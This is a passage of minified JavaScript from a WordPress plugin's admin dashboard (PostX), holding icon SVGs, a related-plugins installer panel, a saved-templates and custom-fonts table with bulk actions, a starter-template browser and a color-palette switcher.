1.0893-.7883.951-1.4518l-2.33-11.17843c-.1383-.66348-.7883-1.08922-1.4518-.95093Zm3.1934 15.32716-11.1785 2.33c-.6635.1383-1.0892.7883-.9509 1.4517l2.33 11.1785c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7882-1.0892-1.4517-.9509Z"}),(0,a.createElement)("path",{fill:"#6C6CFF",d:"M11.4509 35.4957c-.2235-.0003-.4402-.0776-.6136-.2187-.1734-.1412-.293-.3377-.3386-.5566L4.40205 5.44687c-.0671-.32174-.25914-.60372-.53395-.784-.27481-.18029-.60992-.24415-.93177-.17757-.15961.03288-.31112.09709-.44576.18889-.13464.09181-.24976.20939-.33867.34596-.08986.13594-.15175.2884-.1821.4485-.03036.16011-.02855.32465.00531.48404l.47956 2.30076c.05267.25283.00277.51622-.13875.73225-.14152.21603-.36305.367-.61587.41971-.12518.0261-.25429.02728-.37992.00348-.12564-.0238-.24534-.07212-.352302-.1422-.106958-.07007-.199074-.16054-.271063-.26622-.071988-.10568-.122425-.22451-.14848-.3497L.0686777 6.35002c-.0868909-.41-.0913681-.83319-.0132214-1.24494.0781467-.41176.2373657-.80387.4684307-1.15352.228483-.35063.524233-.65249.870113-.8881.34589-.23562.73506-.40032 1.145-.48457.8274-.1712 1.68888-.00722 2.39554.45595.70665.46317 1.20075 1.18772 1.3739 2.01471L12.4051 34.3231c.0294.1417.0269.2883-.0074.4289s-.0996.2719-.1909.3842c-.0914.1122-.2067.2028-.3374.2649-.1307.0622-.2737.0944-.4185.0944v.0002Zm8.49 5.5912c-.2408-.0005-.4729-.0901-.6515-.2515-.1786-.1615-.291-.3834-.3156-.623-.0245-.2395.0404-.4796.1825-.674.1421-.1944.3511-.3293.5868-.3786l27.0841-5.6452c.2528-.0527.5162-.0028.7322.1387.216.1415.3669.3631.4196.6159.0527.2528.0028.5162-.1387.7322-.1415.216-.363.3669-.6158.4196l-27.0841 5.6452c-.0656.0136-.1325.0205-.1995.0207Z"}),(0,a.createElement)("path",{fill:"#070C1A",d:"M12.8922 45.9671c-.8322-.0016-1.647-.2389-2.3499-.6845-.70286-.4456-1.26512-1.0812-1.62162-1.8332-.35651-.752-.49266-1.5896-.39269-2.4158.09996-.8262.43196-1.6072.95753-2.2525.52558-.6452 1.22318-1.1284 2.01208-1.3935.7889-.2651 1.6367-.3012 2.4453-.1043.8086.197 1.5448.619 2.1234 1.2172.5786.5981.9759 1.348 1.1458 2.1627.2383 1.1434.0126 2.3345-.6273 3.3115-.64.977-1.6418 1.6597-2.7852 1.898-.2984.0625-.6025.0941-.9074.0944Zm.014-6.8621c-.1701 0-.3398.0176-.5062.0525-.4757.099-.9113.3369-1.2518.6835-.3404.3467-.5704.7865-.6609 1.2638-.0905.4774-.0374.9708.1525 1.418.19.4472.5083.828.9147 1.0943.4064.2663.8826.4061 1.3684.4017.4859-.0044.9595-.1527 1.361-.4263.4015-.2735.7129-.66.8948-1.1105.1819-.4505.2261-.9449.127-1.4205-.1152-.5517-.4164-1.047-.8533-1.403-.4368-.3561-.9827-.5512-1.5462-.5528v-.0007Z"})),wow_store:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FF176B",d:"M33.4798 8.9711 48 0l-7.1908 32.9249-4.4393 5.9884H4.9711L0 32.9249l3.90751-17.9654 8.76299 2.9827-2.6127 11.9769h6.289l3.9307-17.9653h9.4335l-3.9307 17.9653h6.2891l4.578-20.948h-3.1676ZM9.98852 48.0005c1.66478 0 2.98268-1.3411 2.98268-2.9827s-1.3411-2.9826-2.98268-2.9826c-1.64162 0-2.98266 1.341-2.98266 2.9826 0 1.6416 1.34104 2.9827 2.98266 2.9827Zm15.67578 0c1.6416 0 2.9827-1.3411 2.9827-2.9827s-1.3411-2.9826-2.9827-2.9826-2.9827 1.341-2.9827 2.9826c0 1.6416 1.3411 2.9827 2.9827 2.9827Z"})),wow_revenue:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#00A464",d:"M47.9999 47.9999H36L24 0h12l11.9999 47.9999Zm-12 0H24L12 15.96h12l11.9999 32.0399Zm-12 .0001H12L0 32.04h12L23.9999 48Z"})),wow_optin:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"#F97415",clipPath:"url(#optin_48_path)"},(0,a.createElement)("path",{d:"M28.7992 24.0373c0-2.6419-2.1581-4.8-4.8-4.8-2.6418 0-4.8 2.1581-4.8 4.8 0 2.6419 2.1582 4.8 4.8 4.8 2.6419 0 4.8-2.1581 4.8-4.8Z"}),(0,a.createElement)("path",{d:"M24 48.0372v-9.6c7.9256 0 14.4-6.4744 14.4-14.4S31.9256 9.63721 24 9.63721 9.6 16.1116 9.6 24.0372H0C0 10.7907 10.7535 0 24 0s24 10.7535 24 24-10.7535 24-24 24v.0372Z"}),(0,a.createElement)("path",{d:"m19.2 28.8369-19.2 6.4 8.8186 3.9814L12.8 48.0369l6.4372-19.2H19.2Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"optin_48_path"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h48v48H0z"})))),wow_addon:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 32 32"},(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"1",y:"16.88",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"16.88",y:"1",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("path",{fill:"#86A62C",fillRule:"evenodd",d:"M1.38 2.93C1 3.68 1 4.67 1 6.65v2.82c0 1.98 0 2.97.38 3.72.34.66.88 1.2 1.55 1.54.75.39 1.74.39 3.72.39h2.82c1.98 0 2.97 0 3.72-.39.66-.34 1.2-.88 1.54-1.54.39-.75.39-1.74.39-3.72V6.65c0-1.98 0-2.97-.39-3.72a3.53 3.53 0 0 0-1.54-1.55C12.44 1 11.45 1 9.47 1H6.65c-1.98 0-2.97 0-3.72.38-.67.34-1.2.88-1.55 1.55Zm5.98 8.62 5.73-5.73-1.24-1.25-5.11 5.1-2.47-2.46-1.25 1.25 3.1 3.09c.34.34.9.34 1.24 0ZM16.88 22.53c0-1.98 0-2.97.39-3.72.34-.66.88-1.2 1.54-1.54.75-.39 1.74-.39 3.72-.39h2.82c1.98 0 2.97 0 3.72.39.67.34 1.2.88 1.55 1.54.38.75.38 1.74.38 3.72v2.82c0 1.98 0 2.97-.38 3.72-.34.67-.88 1.2-1.55 1.55-.75.38-1.74.38-3.72.38h-2.82c-1.98 0-2.97 0-3.72-.38a3.53 3.53 0 0 1-1.54-1.55c-.39-.75-.39-1.74-.39-3.72v-2.82Zm6.18.53v-3.09h1.76v3.09h3.1v1.76h-3.1v3.1h-1.76v-3.1h-3.09v-1.76h3.09Z",clipRule:"evenodd"}))},i={wholesale_x:{title:"WholesaleX",subtitle:`WholesaleX \n        ${__("is a B2B wholesale plugin featuring advanced wholesale pricing and customization features.","ultimate-post")}`,install:"installation url",pluginUrl:"https://getwholesalex.com/"},wow_store:{title:"WowStore",subtitle:`WowStore ${__("is a complete WooCommerce store builder featuring advanced options to improve sales!","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/wowstore/"},wow_revenue:{title:"WowRevenue",subtitle:`WowRevenue ${__("boost sales and maximize revenue with the advanced discount campaigns of WowRevenue.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowrevenue.com/"},wow_optin:{title:"WowOptin",subtitle:`WowOptin ${__("generates actionable leads and boost sales with popups, banners, and floating bars using WowOptin.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowoptin.com/"},wow_addon:{title:"WowAddons",subtitle:`WowAddons ${__("extends the functionality of your WooCommerce store with additional features and options.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/product-addons-for-woocommerce/"}},l=()=>{const[e,t]=(0,a.useState)({}),[n,l]=(0,a.useState)(ultp_dashboard_pannel.products||{}),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(ultp_dashboard_pannel.products_active||{}),u=e=>{t((t=>({...t,[e]:!0})));const n=new FormData;n.append("action","ultp_install_plugin"),n.append("wpnonce",ultp_dashboard_pannel.security),n.append("plugin",e),fetch(ultp_dashboard_pannel.ajax,{method:"POST",body:n}).then((e=>e.json())).then((()=>{})).catch((()=>{})).finally((()=>{t((t=>({...t,[e]:!1}))),l((t=>({...t,[e]:!0}))),d((t=>({...t,[e]:!0})))}))},m=(0,r.t)();return(0,a.useEffect)((()=>{p(!0),setTimeout((()=>{m.current&&p(!1)}),1e3)}),[]),(0,a.createElement)("div",{className:"ultp-plugins-wrapper"},(0,a.createElement)("div",{className:"ultp-plugin-items"},Object.keys(i).map(((t,r)=>((t,r)=>{const l=o[t]||null;return(0,a.createElement)("div",{key:r,className:"ultp-plugin-item"},(0,a.createElement)("div",{className:"ultp-plugin-item-title"},(0,a.createElement)("div",{className:"ultp-product-icon"},l),i[t].title),(0,a.createElement)("div",{className:"ultp-plugin-item-desc"},i[t].subtitle),(0,a.createElement)("div",{className:"ultp-plugin-item-action"},(0,a.createElement)(a.Fragment,null,c[t]?(0,a.createElement)("div",{className:"ultp-secondary-button ultp-activated-button"},__("Activated","ultimate-post")):(0,a.createElement)("div",{className:"ultp-secondary-button ultp-plugin-active-btn",onClick:()=>u(t),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&u(t)}},(0,a.createElement)("div",null,n[t]?__("Activate","ultimate-post"):__("Install","ultimate-post")),e[t]&&(0,a.createElement)("span",{className:"ultp-plugin-item-loading"}))),(0,a.createElement)("div",{className:"ultp-transparent-alter-button",role:"button",tabIndex:-1,onClick:()=>window.open(i[t].pluginUrl,"_blank"),onKeyDown:e=>{"Enter"===e.key&&window.open(i[t].pluginUrl,"_blank")}},__("Plugin Details","ultimate-post"))))})(t,r)))))}},5957:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(356),o=n(4766),i=n(4482),l=n(8949);n(6680);const{__}=wp.i18n,s=e=>{const[t,n]=(0,a.useState)([]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(1),[u,m]=(0,a.useState)(0),[f,h]=(0,a.useState)(""),[g,v]=(0,a.useState)(0),[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(""),[y,k]=(0,a.useState)([]),[E,C]=(0,a.useState)(""),[S,M]=(0,a.useState)(!1),[L,N]=(0,a.useState)({state:!1,status:""}),[Z,P]=(0,a.useState)(!1);(0,a.useEffect)((()=>(z(),document.addEventListener("mousedown",B),()=>document.removeEventListener("mousedown",B))),[]);const z=(t={})=>{A({action:"dashborad",data:Object.assign({},{type:"saved_templates",pages:c,pType:e.type},t)})},A=e=>{wp.apiFetch({path:"/ultp/v2/"+e.action,method:"POST",data:e.data}).then((t=>{if(t.success)switch(e.data.type){case"saved_templates":k(Array(t.data.length).fill(!1)),n(t.data),p(!(t.data.length>0)),h(t.new),m(t.found),v(t.pages),x(""),w(!1),e.data.search&&d(1);break;case"status":case"delete":case"duplicate":case"action_draft":case"action_delete":case"action_publish":z(),w(!1),N({status:e.data.type.includes("delete")?"error":"success",messages:[t.message],state:!0})}}))},B=e=>{e.target.parentNode.classList.contains("ultp-reserve-button")||(C(""),M(!1))};return(0,a.createElement)("div",{className:`ultp-${"ultp_templates"==e.type?"saved-template":"custom-font"}-container`},L.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:L,setToastMessages:N}),f?(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type&&!ultp_dashboard_pannel.active&&t?.length>0?(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>P(!0)},__("Add New","ultimate-post")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("a",{className:"ultp-primary-button ",target:"_blank",href:f,rel:"noreferrer"},__("Add New","ultimate-post")))):(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:108,unit1:"px",size2:46,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"tableCon"},(0,a.createElement)("div",{className:"ultp-bulk-con ultp-dash-item-con"},(0,a.createElement)("div",null,(0,a.createElement)("select",{value:b,onChange:e=>x(e.target.value)},(0,a.createElement)("option",{value:""},__("Bulk Action","ultimate-post")),(0,a.createElement)("option",{value:"publish"},__("Publish","ultimate-post")),(0,a.createElement)("option",{value:"draft"},__("Draft","ultimate-post")),(0,a.createElement)("option",{value:"delete"},__("Delete","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>{const e=y.filter((e=>Number.isInteger(e)));b&&e.length>0&&("delete"==b?confirm("Are you sure you want to apply the action?")&&A({action:"dashborad",data:{type:"action_"+b,ids:e}}):A({action:"dashborad",data:{type:"action_"+b,ids:e}}))}},__("Apply","ultimate-post"))),(0,a.createElement)("input",{type:"text",placeholder:"Search...",onChange:e=>{z({search:e.target.value})}})),(0,a.createElement)("div",{className:"ultpTable"},(0,a.createElement)("table",{className:0!=t.length||s?"":"skeletonOverflow"},(0,a.createElement)("thead",null,(0,a.createElement)("tr",null,(0,a.createElement)("th",null,(0,a.createElement)("input",{type:"checkbox",checked:_,onChange:e=>{k(_?Array(t.length).fill(!1):t.map((e=>e.id))),w(!_)}})),(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Title","ultimate-post")),(0,a.createElement)("th",null,__("Shortcode","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Font Family","ultimate-post")),(0,a.createElement)("th",{className:"fontpreview"},__("Preview","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF2","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("TTF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("SVG","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("EOT","ultimate-post"))),(0,a.createElement)("th",{className:"dateHead"},__("Date","ultimate-post")),(0,a.createElement)("th",null,__("Action","ultimate-post"))))),(0,a.createElement)("tbody",null,t?.map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)("input",{type:"checkbox",checked:!!y[n],onChange:()=>{const e=[...y];e.splice(n,1,!y[n]&&t.id),k(e)}})),(t=>{let n="",r={fontFamily:"",fontWeight:""};if("ultp_templates"!=e.type&&t?.font_settings?.length>0){const e=t.font_settings[0],a=[];e.woff&&a.push(`url(${e.woff}) format('woff')`),e.woff2&&a.push(`url(${e.woff2}) format('woff2')`),e.ttf&&a.push(`url(${e.ttf}) format('TrueType')`),e.svg&&a.push(`url(${e.svg}) format('svg')`),e.eot&&a.push(`url(${e.eot}) format('eot')`),n+=` @font-face {\n                font-family: "${t.title}";\n                font-weight: ${e.weight};\n                font-display: auto;\n                src: ${a.join(", ")};\n            } `,r={fontFamily:t.title,fontWeight:e.weight}}return(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"shortCode",onClick:e=>{(e=>{let t=!1;if(navigator.clipboard)t=navigator.clipboard.writeText(e.target.innerHTML);else{const n=document.createElement("input");n.setAttribute("value",e.target.innerHTML),document.body.appendChild(n),n.select(),t=document.execCommand("copy"),document.body.removeChild(n)}if(t){const t=document.createElement("span");t.innerText="Copied!",e.target.appendChild(t),setTimeout((()=>{e.target.removeChild(t)}),800)}})(e)}},'[postx_template id="',t.id,'"]'))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),t.title&&(0,a.createElement)("style",{type:"text/css"},n),(0,a.createElement)("td",{style:r},__("The quick brown fox jumps over the lazy dog.","ultimate-post")),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff2?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.ttf?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.svg?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.eot?"dashicons-yes":"dashicons-no-alt")}))))})(t),(0,a.createElement)("td",{className:"typeDate"},"publish"==t.status?"Published":t.status," ",(0,a.createElement)("br",null),t.date),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"actions ultp-reserve-button",onClick:e=>{M(!S),C(t.id)}},(0,a.createElement)("span",{className:"dashicons dashicons-ellipsis"}),E==t.id&&S&&(0,a.createElement)("ul",{className:"ultp-dash-item-con actionPopUp ultp-reserve-button"},(0,a.createElement)("li",{className:"ultp-reserve-button"},(0,a.createElement)("a",{target:"_blank",href:t?.edit?.replace("&amp;","&"),rel:"noreferrer"},(0,a.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post"))),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure?")&&A({action:"template_action",data:{type:"status",id:t.id,status:"publish"==t.status?"draft":"publish"}})}},(0,a.createElement)("span",{className:"dashicons dashicons-open-folder"}),__("Set to","ultimate-post")," ","draft"==t.status?"Publish":"Draft"),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to delete?")&&A({action:"template_action",data:{type:"delete",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),"ultp_templates"==e.type&&(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&A({action:"template_action",data:{type:"duplicate",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")))))))),0==t.length&&s&&(0,a.createElement)("tr",null,"ultp_templates"==e.type?(0,a.createElement)("td",{colSpan:5},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post"))):(0,a.createElement)("td",{colSpan:10},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post")))),0==t.length&&!s&&(0,a.createElement)(a.Fragment,null,Array(5).fill(1).map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:20,unit2:"px",br:4}})),"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,Array(4).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"}))))):(0,a.createElement)(a.Fragment,null,Array(9).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"})))))))))))),(0,a.createElement)("div",{className:"pageCon"},(0,a.createElement)("div",null,__("Page","ultimate-post")," ",g>0?c:g," ",__("of","ultimate-post")," ",g," ["," ",u," ",__("items","ultimate-post")," ]"),g>0&&(0,a.createElement)("div",{className:"ultpPages"},c>1&&(0,a.createElement)("span",{onClick:()=>{const e=c-1;z({pages:e}),d(e)}},o.ZP.leftAngle2),(0,a.createElement)("span",{className:"currentPage"},c),g>c&&(0,a.createElement)("span",{onClick:()=>{const e=c+1;z({pages:e}),d(e)}},o.ZP.rightAngle2)))),Z&&(0,i.cs)({tags:"menu_save_temp_pro",func:e=>{P(e)},data:{icon:"saved_template_lock.svg",title:__("Create Unlimited Saved Templates with PostX Pro","ultimate-post"),description:__("You can create only one saved template with the free version of PostX. Please upgrade to a pro plan to create unlimited saved templates.","ultimate-post")}}))}},3554:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(1383),o=n(448),i=n(4766),l=n(8949),s=n(356),p=n(814),c=n(6488);const{__}=wp.i18n,d=e=>{const[t,n]=(0,a.useState)({templates:[],designs:[],reloadId:"",reload:!1,isTemplate:!0,error:!1,fetching:!1,loading:!1}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)("all"),[h,g]=(0,a.useState)("all"),[v,_]=(0,a.useState)("all"),[w,b]=(0,a.useState)([]),[x,y]=(0,a.useState)(!1),[k,E]=(0,a.useState)({state:!1,status:""}),[C,S]=(0,a.useState)("3"),[M,L]=(0,a.useState)(""),[N,Z]=(0,a.useState)([]),{loading:P,fetching:z}=t,A=(0,r.t)(),B=async()=>{n((e=>({...e,loading:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&A.current&&e.data){const t=JSON.parse(e.data);Z(t),n((e=>({...e,loading:!1})))}}))},H=[{value:"all",label:__("All Categories","ultimate-post")},{value:"news",label:__("News","ultimate-post")},{value:"magazine",label:__("Magazine","ultimate-post")},{value:"blog",label:__("Blog","ultimate-post")},{value:"sports",label:__("Sports","ultimate-post")},{value:"fashion",label:__("Fashion","ultimate-post")},{value:"tech",label:__("Tech","ultimate-post")},{value:"travel",label:__("Travel","ultimate-post")},{value:"food",label:__("Food","ultimate-post")},{value:"movie",label:__("Movie","ultimate-post")},{value:"health",label:__("Health","ultimate-post")},{value:"gaming",label:__("Gaming","ultimate-post")},{value:"nft",label:__("NFT","ultimate-post")}];(0,a.useEffect)((()=>{T("","","fetchData"),B()}),[]);const T=(e,t="",n="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:n}}).then((e=>{e.success&&A.current&&(b(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{})),"fetchData"!=n&&E({status:"success",messages:[e.message],state:!0}))}))};if(M){document.querySelector("#adminmenumain").style="display: none;",document.querySelector(".ultp-settings-container").style="min-height: unset;";const e=N.filter((e=>e.live==M))[0];return(0,a.createElement)(p.Z,{_val:e,setLiveUrl:L,liveUrl:M})}document.querySelector("#adminmenumain").style="",document.querySelector(".ultp-settings-container").style="";let R=(0,o.cC)(w.join(""),[]);R&&"object"==typeof R&&!Array.isArray(R)&&(R=Object.keys(R).sort(((e,t)=>e-t)).map((e=>R[e])));const O=N.map((e=>e.ID)).sort(((e,t)=>t-e)).slice(0,3);return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-templatekit-wrap"},k.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:k,setToastMessages:E}),(0,a.createElement)("div",{className:"ultp-templatekit-list-container "},(0,a.createElement)(c.Z,{changeStates:(e,t)=>{"freePro"==e?_(t):"search"==e?u(t):"column"==e?S(t):"wishlist"==e?y(t):"trend"==e?(f(t),"latest"==t||"all"==t?N.sort(((e,t)=>t.ID-e.ID)):"popular"==t&&N[0]&&N[0].hit&&N.sort(((e,t)=>t.hit-e.hit))):"filter"==e&&g(t)},useState:a.useState,useEffect:a.useEffect,useRef:a.useRef,column:C,showWishList:x,_fetchFile:()=>{n((e=>({...e,fetching:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&A.current&&(B(),n((e=>({...e,fetching:!1}))),E({status:"success",messages:[e.message],state:!0}))}))},fetching:z,searchQuery:d,fields:{filter:!0,trend:!0,freePro:!0},fieldOptions:{filterArr:H,trendArr:[],freeProArr:[]},fieldValue:{filter:h,trend:m,freePro:v}}),N.length>0?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col"+C},N.map((e=>e.title?.toLowerCase().includes(d.toLowerCase())&&("all"==h||"all"!=h&&(h==e.category||(Array.isArray(e.parent_cat)?e.parent_cat:Object.values(e.parent_cat||{})).includes(h)))&&("all"==v||"pro"==v&&e.pro||"free"==v&&!e.pro)&&(!x||x&&R?.includes(e.ID))&&(0,a.createElement)("div",{key:e.ID,className:"ultp-item-wrapper ultp-starter-group "},(0,a.createElement)("div",{className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)("a",{className:"ultp-templatekit-img bg-image-aspect",href:"#",style:{backgroundImage:`url(https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.ID}/postx_importer_img/pages/home.jpg)`}}),(0,a.createElement)("div",{className:"ultp-list-dark-overlay"},!ultp_dashboard_pannel.active&&(0,a.createElement)(a.Fragment,null,e.pro?(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",onClick:()=>L(e.live)},i.ZP.eye,__("Live Preview","ultimate-post"))),e.pro&&(0,a.createElement)("div",{className:"ultp-list-info-tag-pro"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)("div",{className:"ultp-list-info",onClick:()=>L(e.live)},(0,a.createElement)("div",{className:"ultp-list-info-title"},e.title,O.includes(e.ID)&&(0,a.createElement)("div",{className:"ultp-list-info-tag-new"},"NEW")),(0,a.createElement)("div",{className:"ultp-list-info-count"},e.templates?.length&&e.templates?.length+" templates")),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{T(e.ID,R?.includes(e.ID)?"remove":"")}},i.ZP[R?.includes(e.ID)?"love_solid":"love_line"]))))))))):P?(0,a.createElement)("div",{className:"ultp-premade-grid skeletonOverflow ultp-templatekit-col"+C},Array(25).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:440,unit2:"px"}})),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})))))))):(0,a.createElement)("span",{className:"ultp-image-rotate"},__("No Data Available…","ultimate-post")))))}},4371:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(448),o=n(5404);const{__}=wp.i18n,i=({ultpPresetColors:e,currentPresetColors:t,setCurrentPresetColors:n,setCurrentPostxGlobal:i,currentPostxGlobal:l})=>{const s={...e,rootCSS:(0,r.AJ)("styleCss",e)},[p,c]=(0,a.useState)({...t,...s}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)(!1),h=(0,r.AJ)("colorStacks"),g=(0,r.AJ)("presetColorKeys");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetColors","",(e=>{if(e.data){const t={...e.data,...p};n({...t,rootCSS:(0,r.AJ)("styleCss",t)})}}))}),[]);const v=(e,a="")=>{let o={...t,...e};"darkhandle"!=a&&m&&(o=_(o));const i=((e={},t="")=>{const n=(0,r.AJ)("styleCss",e),a=document.querySelector("#ultp-starter-preview");if(a.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:n,dlMode:"darkhandle"==t?m?"ultpLight":"ultpDark":m?"ultpDark":"ultpLight"};a.contentWindow.postMessage(e,"*")}return n})(o,a);c(o),n({...o,rootCSS:i})},_=(e={})=>({...e,Base_1_color:e.Contrast_1_color,Base_2_color:e.Contrast_2_color,Base_3_color:e.Contrast_3_color,Contrast_1_color:e.Base_1_color,Contrast_2_color:e.Base_2_color,Contrast_3_color:e.Base_3_color});return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_dark_container"},(0,a.createElement)("div",{onClick:()=>(()=>{const e=_(t);document.querySelector(".ultp-dl-container .ultp-dl-svg-con").style=`transform: translateX(${m?"":"calc( 100% + 71px )"}); transition: transform .4s ease`,document.querySelector(".ultp-dl-container .ultp-dl-svg-title").style=`transform: translateX(${m?"":"calc( -100% + 50px )"}); transition: transform .4s ease`,setTimeout((()=>{f(!m),i({...l,enableDark:!m}),v(e,"darkhandle")}),400)})(),className:" ultp-dl-container "},(0,a.createElement)("div",{className:"ultp-dl-svg-con "+(m?"dark":"")},(0,a.createElement)("div",{className:"ultp-dl-svg"},o.Z[m?"moon":"sun"])),(0,a.createElement)("div",{className:"ultp-dl-svg-title"},m?"Dark Mode":"Light Mode"))),(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Color Palette","ultimate-post")),d&&(0,a.createElement)("span",{className:"dashicons 